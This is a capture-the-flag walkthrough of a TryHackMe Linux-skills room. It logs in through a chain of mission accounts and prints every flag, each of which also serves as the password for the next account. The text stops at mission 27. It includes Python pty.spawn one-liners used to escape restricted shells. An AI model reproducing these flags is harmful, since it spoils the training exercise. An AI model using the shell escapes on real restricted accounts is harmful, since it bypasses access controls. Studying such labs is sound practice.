Tryhackme - Linux Agency

Tryhackme – Linux Agency

In this walk through, we will be going through the Linux Agency room from Tryhackme. This Room will help you to sharpen your Linux Skills and help you to learn basic privilege escalation in a HITMAN theme. So, pack your briefcase and grab your SilverBallers as its gonna be a tough ride. On that note, let’s get started.

Linux Agency

Machine Info:

TitleLinuxagency 1.5
IPaddress10.10.86.7
DifficultyMedium
ObjectiveThis Room will help you to sharpen your Linux Skills and help you to learn basic privilege escalation in a HITMAN theme. So, pack your briefcase and grab your SilverBallers as its gonna be a tough ride.

Task 1 – Deploy The Machine

Task 1 - Deploy The Machine

Task 2 – Let’s just jump in

Task 2 - Let's just jump in

Task 3 – Linux Fundamentals

Question 1 – What is the mission1 flag?

  • The first flag is already presented on the banner screen of your SSH login.

wh1terose@fsociety:~$ ssh [email protected] 
The authenticity of host '10.10.86.7 (10.10.86.7)' can't be established.
ECDSA key fingerprint is SHA256:NPQ78ILJE6Ra+F9r/z2ZUWdpPGeAHnuNAc5kOaFbTjU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.86.7' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.

mission1{174dc8f191bcbb161fe25f8a5b58d1f0}
agent47@linuxagency:~$ 

mission 1 flag

mission1{174dc8f191bcbb161fe25f8a5b58d1f0}

Question 2 – What is the mission2 flag?

  • To move ahead, use the mission 1 flag string as a password for the user – mission 1. It reveals the mission 2 flag. Use the same to login as mission 2.

agent47@linuxagency:/home$ su mission1
Password: 
mission1@linuxagency:/home$ ls
0z09e    diana   maya       mission11  mission14  mission17  mission2   mission22  mission25  mission28  mission30  mission6  mission9  sean    xyan1d3
agent47  jordan  mission1   mission12  mission15  mission18  mission20  mission23  mission26  mission29  mission4   mission7  penelope  silvio
dalia    ken     mission10  mission13  mission16  mission19  mission21  mission24  mission27  mission3   mission5   mission8  reza      viktor
mission1@linuxagency:/home$ cd mission1
mission1@linuxagency:~$ ls
mission2{8a1b68bb11e4a35245061656b5b9fa0d}
mission1@linuxagency:~$ 

mission1@linuxagency:~$ su mission2
Password: 
mission2@linuxagency:/home/mission1$ 
mission2@linuxagency:/home/mission1$ 

mission 2 flag

mission 2

mission2{8a1b68bb11e4a35245061656b5b9fa0d}

Question 3 – What is the mission3 flag?

  • Now, read the contents of the flag.txt using “cat” to reveal the mission 3 password.

mission2@linuxagency:/home$ cd mission2
mission2@linuxagency:~$ ls -l
total 4
-r-------- 1 mission2 mission2 43 Jan 12  2021 flag.txt
mission2@linuxagency:~$ cat flag.txt 
mission3{ab1e1ae5cba688340825103f70b0f976}
mission2@linuxagency:~$ 

mission 3 flag

mission3{ab1e1ae5cba688340825103f70b0f976}

Question 4 – What is the mission4 flag?

  • With the help of the mission 3 credentials found earlier, I changed my user to mission3. With the help of this, read the contents of the flag.txt which reveals that flag has been stolen. But, if we try to open the file with a text editor like “nano”, it gives us our flag.

mission2@linuxagency:~$ su mission3
Password: 
mission3@linuxagency:/home/mission2$ cd ..
mission3@linuxagency:/home$ cd mission3
mission3@linuxagency:~$ cat flag.txt 
I am really sorry man the flag is stolen by some thief's.
mission3@linuxagency:~$ 

mission 3

mission 4 flag

mission4{264a7eeb920f80b3ee9665fafb7ff92d}

Question 5 – What is the mission5 flag?

  • Further for mission 5, read out the contents of the flag.txt in the flag directory in its home folder.

mission3@linuxagency:/home$ su mission4
Password: 
mission4@linuxagency:/home$ cd mission4
mission4@linuxagency:~$ ls -la
total 20
drwxr-x---  3 mission4 mission4 4096 Jan 12  2021 .
drwxr-xr-x 45 root     root     4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission4 mission4    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission4 mission4 3771 Jan 12  2021 .bashrc
drwxr-xr-x  2 mission4 mission4 4096 Jan 12  2021 flag
-rw-r--r--  1 mission4 mission4  807 Jan 12  2021 .profile
mission4@linuxagency:~$ cd flag/
mission4@linuxagency:~/flag$ ls -la
total 12
drwxr-xr-x 2 mission4 mission4 4096 Jan 12  2021 .
drwxr-x--- 3 mission4 mission4 4096 Jan 12  2021 ..
-r-------- 1 mission4 mission4   43 Jan 12  2021 flag.txt
mission4@linuxagency:~/flag$ cat flag.txt 
mission5{bc67906710c3a376bcc7bd25978f62c0}
mission4@linuxagency:~/flag$ 

mission 5 flag

mission5{bc67906710c3a376bcc7bd25978f62c0}

Question 6 – What is the mission6 flag?

  • For mission6 flag, read the hidden file – .flag.txt.

mission4@linuxagency:/home$ su mission5
Password: 
mission5@linuxagency:/home$ cd mission5
mission5@linuxagency:~$ ls -l
total 0
mission5@linuxagency:~$ pwd
/home/mission5
mission5@linuxagency:~$ ls -la
total 20
drwxr-x---  2 mission5 mission5 4096 Jan 12  2021 .
drwxr-xr-x 45 root     root     4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission5 mission5    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission5 mission5 3771 Jan 12  2021 .bashrc
-r--------  1 mission5 mission5   43 Jan 12  2021 .flag.txt
-rw-r--r--  1 mission5 mission5  807 Jan 12  2021 .profile
mission5@linuxagency:~$ cat .flag.txt 
mission6{1fa67e1adc244b5c6ea711f0c9675fde}
mission5@linuxagency:~$ 

mission 6 flag

mission6{1fa67e1adc244b5c6ea711f0c9675fde}

Question 7 – What is the mission7 flag?

  • The flag for mission7 was stored inside flag.txt file inside a hidden .flag directory.

mission5@linuxagency:/home$ su mission6
Password: 
mission6@linuxagency:/home$ cd mission6
mission6@linuxagency:~$ ls -la
total 20
drwxr-x---  3 mission6 mission6 4096 Jan 12  2021 .
drwxr-xr-x 45 root     root     4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission6 mission6    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission6 mission6 3771 Jan 12  2021 .bashrc
drwxr-xr-x  2 mission6 mission6 4096 Jan 12  2021 .flag
-rw-r--r--  1 mission6 mission6  807 Jan 12  2021 .profile
mission6@linuxagency:~$ cd .flag/
mission6@linuxagency:~/.flag$ ls -l
total 4
-r-------- 1 mission6 mission6 43 Jan 12  2021 flag.txt
mission6@linuxagency:~/.flag$ cat flag.txt a
mission7{53fd6b2bad6e85519c7403267225def5}
cat: a: No such file or directory
mission6@linuxagency:~/.flag$ cat flag.txt
mission7{53fd6b2bad6e85519c7403267225def5}
mission6@linuxagency:~/.flag$ 

mission 7 flag

mission7{53fd6b2bad6e85519c7403267225def5}

Question 8 – What is the mission8 flag?

mission6@linuxagency:/home$ su mission7
Password: 
bash: /home/mission6/.bashrc: Permission denied
mission7@linuxagency:/home$ cd mission7
mission7@linuxagency:/home/mission7$ ls -la
total 20
drwxr-x---  2 mission7 mission7 4096 Jan 12  2021 .
drwxr-xr-x 45 root     root     4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission7 mission7    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission7 mission7 3771 Jan 12  2021 .bashrc
-r--------  1 mission7 mission7   43 Jan 12  2021 flag.txt
-rw-r--r--  1 mission7 mission7  807 Jan 12  2021 .profile
mission7@linuxagency:/home/mission7$ cat flag.txt 
mission8{3bee25ebda7fe7dc0a9d2f481d10577b}
mission7@linuxagency:/home/mission7$ 

mission 8 flag

mission8{3bee25ebda7fe7dc0a9d2f481d10577b}

Question 9 – What is the mission9 flag?

  • This task has nothing in his home directory. To reveal the same go to the base directory, there we found the flag for mission 9.

mission7@linuxagency:/home$ su mission8
Password: 
mission8@linuxagency:/home$ cd mission8
mission8@linuxagency:~$ ls -l
total 0
mission8@linuxagency:~$ cd ../..
mission8@linuxagency:/$ ls
bin   cdrom  etc       home        initrd.img.old  lib64       media  opt   root  sbin  srv       sys  usr  vmlinuz
boot  dev    flag.txt  initrd.img  lib             lost+found  mnt    proc  run   snap  swapfile  tmp  var
mission8@linuxagency:/$ cat flag.txt 
mission9{ba1069363d182e1c114bef7521c898f5}
mission8@linuxagency:/$ 

mission 8

mission9{ba1069363d182e1c114bef7521c898f5}

Question 10 – What is the mission10 flag?

  • Moving on to mission 10, here we have rockyou.txt to. We will use the grep command to filter out the flag occurrence and thus flag was revealed.

mission8@linuxagency:/home$ su mission9
Password: 
mission9@linuxagency:/home$ cd mission9
mission9@linuxagency:~$ ls -la
total 136664
drwxr-x---  2 mission9 mission9      4096 Jan 12  2021 .
drwxr-xr-x 45 root     root          4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission9 mission9         9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission9 mission9      3771 Jan 12  2021 .bashrc
-rw-r--r--  1 mission9 mission9       807 Jan 12  2021 .profile
-r--------  1 mission9 mission9 139921551 Jan 12  2021 rockyou.txt


mission9@linuxagency:~$ cat rockyou.txt | grep "mission10"
mission101
mission10
mission10{0c9d1c7c5683a1a29b05bb67856524b6}
mission1098
mission108
mission9@linuxagency:~$ 

mission 9

mission 10 flag

mission10{0c9d1c7c5683a1a29b05bb67856524b6}

Question 11 – What is the mission11 flag?

  • As we can see, there is a directory called “folder” inside the mission 10 home folder. The directories contains a tree of sub-directories inside it. We will use the grep command with the recursive option to get the mission 11 flag.

mission9@linuxagency:/home$ su mission10
Password: 
mission10@linuxagency:/home$ cd mission10
mission10@linuxagency:~$ ls -l
total 4
drwxr-xr-x 12 mission10 mission10 4096 Jan 12  2021 folder
mission10@linuxagency:~$ cd folder/
mission10@linuxagency:~/folder$ ls
L4D1  L4D10  L4D2  L4D3  L4D4  L4D5  L4D6  L4D7  L4D8  L4D9
mission10@linuxagency:~/folder$ grep -r "mission11"
L4D8/L3D7/L2D2/L1D10/flag.txt:mission11{db074d9b68f06246944b991d433180c0}
mission10@linuxagency:~/folder$ 

mission 11 flag

mission11{db074d9b68f06246944b991d433180c0}

Question 12 – What is the mission12 flag?

  • As per the question hint, we have to look into the environment variable. Doing so with the help of the “env” command, reveals the mission 12 flag.

mission10@linuxagency:/home$ su mission11
Password: 
mission11@linuxagency:/home$ cd mission11
mission11@linuxagency:~$ ls -la
total 20
drwxr-x---  3 mission11 mission11 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission11 mission11    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission11 mission11 3963 Jan 12  2021 .bashrc
drwxr-xr-x  3 mission11 mission11 4096 Jan 12  2021 .local
-rw-r--r--  1 mission11 mission11  807 Jan 12  2021 .profile
mission11@linuxagency:~$ env
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=10.18.11.103 58186 10.10.86.7 22
LESSCLOSE=/usr/bin/lesspipe %s %s
LANG=en_US.UTF-8
OLDPWD=/home
XDG_SESSION_ID=17
USER=mission11
PWD=/home/mission11
HOME=/home/mission11
SSH_CLIENT=10.18.11.103 58186 22
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
SSH_TTY=/dev/pts/0
MAIL=/var/mail/mission11
FLAG=mission12{f449a1d33d6edc327354635967f9a720}
SHELL=/bin/bash
TERM=xterm-256color
flag=mission12{f449a1d33d6edc327354635967f9a720}
SHLVL=12
LOGNAME=mission11
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
XDG_RUNTIME_DIR=/run/user/1000
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
LESSOPEN=| /usr/bin/lesspipe %s
_=/usr/bin/env
mission11@linuxagency:~$ 

mission 11

env

mission12{f449a1d33d6edc327354635967f9a720}

Question 13 – What is the mission13 flag?

  • While checking the contents of flag,txt file encountered an error of permission denied. On checking the permissions, found out that no permissions were set on the file. Setting it for the read permission and checking inside it gives us our flag.

mission11@linuxagency:/home$ su mission12
Password: 
mission12@linuxagency:/home$ cd mission12
mission12@linuxagency:~$ ls
flag.txt
mission12@linuxagency:~$ cat flag.txt 
cat: flag.txt: Permission denied
mission12@linuxagency:~$ ls -l
total 4
---------- 1 mission12 mission12 44 Jan 12  2021 flag.txt
mission12@linuxagency:~$ chmod +r flag.txt 
mission12@linuxagency:~$ ls -l
total 4
-r--r--r-- 1 mission12 mission12 44 Jan 12  2021 flag.txt
mission12@linuxagency:~$ cat flag.txt 
mission13{076124e360406b4c98ecefddd13ddb1f}
mission12@linuxagency:~$ 

mission 13 flag

 mission13{076124e360406b4c98ecefddd13ddb1f}

Question 14 – What is the mission14 flag?

  • For this question, we have to decode a base 64 string to normal text to reveal the flag for mission 14.
mission12@linuxagency:/home$ su mission13
Password: 
mission13@linuxagency:/home$ cd mission13
mission13@linuxagency:~$ ls -la
total 28
drwxr-x---  3 mission13 mission13 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission13 mission13    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission13 mission13 3771 Jan 12  2021 .bashrc
-r--------  1 mission13 mission13   61 Jan 12  2021 flag.txt
drwxr-xr-x  3 mission13 mission13 4096 Jan 12  2021 .local
-rw-r--r--  1 mission13 mission13  807 Jan 12  2021 .profile
-rw-------  1 mission13 mission13  978 Jan 12  2021 .viminfo
mission13@linuxagency:~$ cat flag.txt 
bWlzc2lvbjE0e2Q1OThkZTk1NjM5NTE0Yjk5NDE1MDc2MTdiOWU1NGQyfQo=
mission13@linuxagency:~$ echo -n "bWlzc2lvbjE0e2Q1OThkZTk1NjM5NTE0Yjk5NDE1MDc2MTdiOWU1NGQyfQo=" | base64 --decode
mission14{d598de95639514b9941507617b9e54d2}
mission13@linuxagency:~$ 

mission 14 flag

mission14{d598de95639514b9941507617b9e54d2}

Question 15 – What is the mission15 flag?

  • Next, for this one we have decoded the binary data found in the flag file and decoded with Cyberchef.

mission13@linuxagency:/home$ su mission14
Password: 
mission14@linuxagency:/home$ cd mission14
mission14@linuxagency:~$ ls -la
total 20
drwxr-x---  2 mission14 mission14 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission14 mission14    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission14 mission14 3771 Jan 12  2021 .bashrc
-r--------  1 mission14 mission14  345 Jan 12  2021 flag.txt
-rw-r--r--  1 mission14 mission14  807 Jan 12  2021 .profile
mission14@linuxagency:~$ cat flag.txt 
01101101011010010111001101110011011010010110111101101110001100010011010101111011011001100110001100110100001110010011000100110101011001000011100000110001001110000110001001100110011000010110010101100110011001100011000000110001001100010011100000110101011000110011001100110101001101000011011101100110001100100011010100110101001110010011011001111101
mission14@linuxagency:~$ 

mission 14

Cyberchef binary decode

mission15{fc4915d818bfaeff01185c3547f25596}

Question 16 – What is the mission16 flag?

  • We looked into the mission15 folder and found a flag.txt file. Reading it, found out an encoded staring. Further, decoded the string from hex to ascii using Cyberchef.

mission14@linuxagency:/home/agent47$ su mission15
Password: 
mission15@linuxagency:/home/agent47$ cd ..
mission15@linuxagency:/home$ cd mission15
mission15@linuxagency:~$ ls
flag.txt
mission15@linuxagency:~$ cat flag.txt 
6D697373696F6E31367B38383434313764343030333363346332303931623434643763323661393038657D
mission15@linuxagency:~$ 

flag.txt

Cybercheg Hex Decode

mission16{884417d40033c4c2091b44d7c26a908e}

Question 17 – What is the mission17 flag?

  • For this question, we logged into mission 16 and found out a file in its home folder. Apparently, the file is a binary file however no execute permissions has been setup on the file. Set it up with the +x flag and executed it to reveal the flag.
mission15@linuxagency:~$ su mission16
Password: 
mission16@linuxagency:/home/mission15$ cd ..
mission16@linuxagency:/home$ cd mission16
mission16@linuxagency:~$ ls -l
total 12
-r-------- 1 mission16 mission16 8440 Jan 12  2021 flag
mission16@linuxagency:~$ chmod +x flag 
mission16@linuxagency:~$ ls -l
total 12
-r-x--x--x 1 mission16 mission16 8440 Jan 12  2021 flag
mission16@linuxagency:~$ ./flag 


mission17{49f8d1348a1053e221dfe7ff99f5cbf4}

mission16@linuxagency:~$ 

mission 17 flag

mission17{49f8d1348a1053e221dfe7ff99f5cbf4}

Question 18 – What is the mission18 flag?

  • This question deals with java. First compile the file.java file with javac and then execute it to reveal the flag.

mission16@linuxagency:~$ su mission17
Password: 
mission17@linuxagency:/home/mission16$ cd ..
mission17@linuxagency:/home$ cd mission17
mission17@linuxagency:~$ ls -la
total 20
drwxr-x---  2 mission17 mission17 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission17 mission17    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission17 mission17 3771 Jan 12  2021 .bashrc
-rwxr-xr-x  1 mission17 mission17  475 Jan 12  2021 flag.java
-rw-r--r--  1 mission17 mission17  807 Jan 12  2021 .profile


mission17@linuxagency:~$ javac flag.java 
mission17@linuxagency:~$ ls -l
total 8
-rw-rw-r-- 1 mission17 mission17 1199 Jun 20 07:58 flag.class
-rwxr-xr-x 1 mission17 mission17  475 Jan 12  2021 flag.java
mission17@linuxagency:~$ java flag 
mission18{f09760649986b489cda320ab5f7917e8}
mission17@linuxagency:~$ 

mission 17

mission18 flag

mission18{f09760649986b489cda320ab5f7917e8}

Question 19 – What is the mission19 flag?

  • Now we have to deal with some ruby scripts. As we can see the script does not have executable permission. First we will set it up and then execute it with the ruby command to get the flag.
mission17@linuxagency:~$ su mission18
Password: 
mission18@linuxagency:/home/mission17$ cd ..
mission18@linuxagency:/home$ cd mission18
mission18@linuxagency:~$ ls -la
total 20
drwxr-x---  2 mission18 mission18 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission18 mission18    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission18 mission18 3771 Jan 12  2021 .bashrc
-r--------  1 mission18 mission18  312 Jan 12  2021 flag.rb
-rw-r--r--  1 mission18 mission18  807 Jan 12  2021 .profile
mission18@linuxagency:~$ chmod +x flag.rb 
mission18@linuxagency:~$ ruby flag.rb 
mission19{a0bf41f56b3ac622d808f7a4385254b7}
mission18@linuxagency:~$ 

mission 29 flag

mission19{a0bf41f56b3ac622d808f7a4385254b7}

Question 20 – What is the mission20 flag?

  • Now we have come to C files. First we will compile it using gcc and then execute the compiled binary to get the flag.

mission18@linuxagency:~$ su mission19
Password: 
mission19@linuxagency:/home/mission18$ cd ..
mission19@linuxagency:/home$ cd mission19
mission19@linuxagency:~$ ls -la
total 20
drwxr-x---  2 mission19 mission19 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission19 mission19    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission19 mission19 3771 Jan 12  2021 .bashrc
-r--------  1 mission19 mission19  276 Jan 12  2021 flag.c
-rw-r--r--  1 mission19 mission19  807 Jan 12  2021 .profile
mission19@linuxagency:~$ chmod +x flag.c 
mission19@linuxagency:~$ gcc flag.c -o flag
flag.c: In function ‘main’:
flag.c:5:18: warning: implicit declaration of function ‘strlen’ [-Wimplicit-function-declaration]
     int length = strlen(flag);
                  ^~~~~~
flag.c:5:18: warning: incompatible implicit declaration of built-in function ‘strlen’
flag.c:5:18: note: include ‘<string.h>’ or provide a declaration of ‘strlen’
mission19@linuxagency:~$ ls -l
total 16
-rwxrwxr-x 1 mission19 mission19 8432 Jun 20 08:06 flag
-r-x--x--x 1 mission19 mission19  276 Jan 12  2021 flag.c
mission19@linuxagency:~$ ./flag
mission20{b0482f9e90c8ad2421bf4353cd8eae1c}

mission19@linuxagency:~$ 

mission 20 flag

mission20{b0482f9e90c8ad2421bf4353cd8eae1c}

Question 21 – What is the mission21 flag?

  • Now its time for our good old snake friend – Python. Execute the file with the python keyword to get the flag.

mission19@linuxagency:~$ su mission20
Password: 
mission20@linuxagency:/home/mission19$ cd ..
mission20@linuxagency:/home$ cd mission20
mission20@linuxagency:~$ ls -la
total 20
drwxr-x---  2 mission20 mission20 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission20 mission20    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission20 mission20 3771 Jan 12  2021 .bashrc
-r--------  1 mission20 mission20  186 Jan 12  2021 flag.py
-rw-r--r--  1 mission20 mission20  807 Jan 12  2021 .profile
mission20@linuxagency:~$ chmod +x flag.py 
mission20@linuxagency:~$ python flag.py 
mission21{7de756aabc528b446f6eb38419318f0c}
mission20@linuxagency:~$ 

mission 21 flag

mission21{7de756aabc528b446f6eb38419318f0c}

Question 22 – What is the mission22 flag?

  • For this particular task, there is no file for the flag rather we have to upgrade and stabilize the existing tty shell. I used python to do so. Once executed the command for the tty, got the flag on the screen.

mission20@linuxagency:~$ su mission21
Password: 
$ pwd
/home/mission20
$ cd mission21	
sh: 2: cd: can't cd to mission21
$ cd ..
$ cd mission21	
$ ls -la
total 20
drwxr-x---  3 mission21 mission21 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission21 mission21    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission21 mission21 3853 Jan 12  2021 .bashrc
drwxr-xr-x  3 mission21 mission21 4096 Jan 12  2021 .local
-rw-r--r--  1 mission21 mission21  807 Jan 12  2021 .profile
$ python -c 'import pty;pty.spawn("/bin/bash")'
mission22{24caa74eb0889ed6a2e6984b42d49aaf}
mission21@linuxagency:~$ 

mission 22 flag

mission22{24caa74eb0889ed6a2e6984b42d49aaf}

Question 23 – What is the mission23 flag?

  • In this task, we got trapped inside the python interactive shell session once we login into the mission22 task. To break out of the environment, use the python tty to get the job done.

mission21@linuxagency:~$ su mission22
Password: 
Python 3.6.9 (default, Oct  8 2020, 12:12:24) 
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pty; pty.spawn("/bin/bash")
mission22@linuxagency:/home/mission21$ cd ..
mission22@linuxagency:/home$ cd mission22
mission22@linuxagency:~$ ls -la
total 24
drwxr-x---  2 mission22 mission22 4096 Jun 20 08:20 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission22 mission22    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission22 mission22 3771 Jan 12  2021 .bashrc
-r--------  1 mission22 mission22   44 Jan 12  2021 flag.txt
-rw-r--r--  1 mission22 mission22  807 Jan 12  2021 .profile
-rw-------  1 mission22 mission22  409 Jun 20 08:20 .python_history
mission22@linuxagency:~$ cat flag.txt 
mission23{3710b9cb185282e3f61d2fd8b1b4ffea}
mission22@linuxagency:~$ 

mission 23 flag

mission23{3710b9cb185282e3f61d2fd8b1b4ffea}

Question 24 – What is the mission24 flag?

  • For this task, we got a hint in the home folder of mission23. Post checking the hint, we looked into the /etc/hosts file, in there found an entry of a domain called machine24.com. Curl the domain and found the flag.

mission22@linuxagency:~$ su mission23
Password: 
mission23@linuxagency:/home/mission22$ cd ..
mission23@linuxagency:/home$ cd mission23
mission23@linuxagency:~$ ls -la
total 24
drwxr-x---  3 mission23 mission23 4096 Jan 15  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission23 mission23    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission23 mission23 3771 Jan 12  2021 .bashrc
drwxrwxr-x  3 mission23 mission23 4096 Jan 12  2021 .local
-r--------  1 mission23 mission23   69 Jan 15  2021 message.txt
-rw-r--r--  1 mission23 mission23  807 Jan 12  2021 .profile
mission23@linuxagency:~$ cat message.txt 
The hosts will help you.
[OPTIONAL] Maybe you will need curly hairs.
mission23@linuxagency:~$ cat /etc/hosts
127.0.0.1	localhost	linuxagency	mission24.com
127.0.1.1	ubuntu	linuxagency

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback	linuxagency
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
mission23@linuxagency:~$ curl mission24.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <!--
    Modified from the Debian original for Ubuntu
    Last updated: 2016-11-16
    See: https://launchpad.net/bugs/1288690
  -->
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>mission24{dbaeb06591a7fd6230407df3a947b89c}</title>
    <style type="text/css" media="screen">
  * {
    margin: 0px 0px 0px 0px;
    padding: 0px 0px 0px 0px;
  }

  body, html {
    padding: 3px 3px 3px 3px;


--- snipped ----

mission 23

mission 24 flag

mission24{dbaeb06591a7fd6230407df3a947b89c}

Question 25 – What is the mission25 flag?

  • In this one, we found a binary file named bribe. According to the message in the file, we have to bribe someone in order to reveal the flag. I set the environment variable pocket=money in order to get the flag.

mission23@linuxagency:~$ su mission24
Password: 
mission24@linuxagency:/home/mission23$ cd ..
mission24@linuxagency:/home$ cd mission24
mission24@linuxagency:~$ ls -la
total 40
drwxr-x---  3 mission24 mission24 4096 Feb  1  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission24 mission24    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission24 mission24 3771 Jan 12  2021 .bashrc
-rwxr-xr-x  1 mission24 mission24 8576 Jan 12  2021 bribe
drwxr-xr-x  3 mission24 mission24 4096 Jan 12  2021 .local
-rw-r--r--  1 mission24 mission24  807 Jan 12  2021 .profile
-rw-------  1 mission24 mission24 4934 Jan 12  2021 .viminfo
mission24@linuxagency:~$ ./bribe 


There is a guy who is smuggling flags
Bribe this guy to get the flag
Put some money in his pocket to get the flag

Words are not the price for your flag
Give Me money Man!!!


mission24@linuxagency:~$ export pocket=money
mission24@linuxagency:~$ ./bribe 
Here ya go!!!
mission25{61b93637881c87c71f220033b22a921b}
Don't tell police about the deal man ;)

mission24@linuxagency:~$ 

mission 24

mission 25 flag

mission25{61b93637881c87c71f220033b22a921b}

Question 26 – What is the mission26 flag?

  • Next for mission 25, we are unable to execute most of the common commands. I set the environment path variable of /bin, which help us to execute the commands and getting the flag.
mission24@linuxagency:~$ su mission25
Password: 
mission25@linuxagency:/home/mission24$ cd ..
mission25@linuxagency:/home$ cd mission25
mission25@linuxagency:~$ ls -la
bash: ls: No such file or directory

---snipped ----


mission25@linuxagency:~$ export PATH=/bin
mission25@linuxagency:~$ cat flag.txt 
mission26{cb6ce977c16c57f509e9f8462a120f00}
mission25@linuxagency:~$ 
mission 25

mission 26 flag

mission26{cb6ce977c16c57f509e9f8462a120f00}

Question 27 – What is the mission27 flag?

  • For this task, we have received a jpg image file. Analyzing its headers with the strings command reveals the flag.

mission25@linuxagency:~$ su mission26
Password: 
mission26@linuxagency:/home/mission25$ cd .,
bash: cd: .,: Permission denied
mission26@linuxagency:/home/mission25$ cd ..
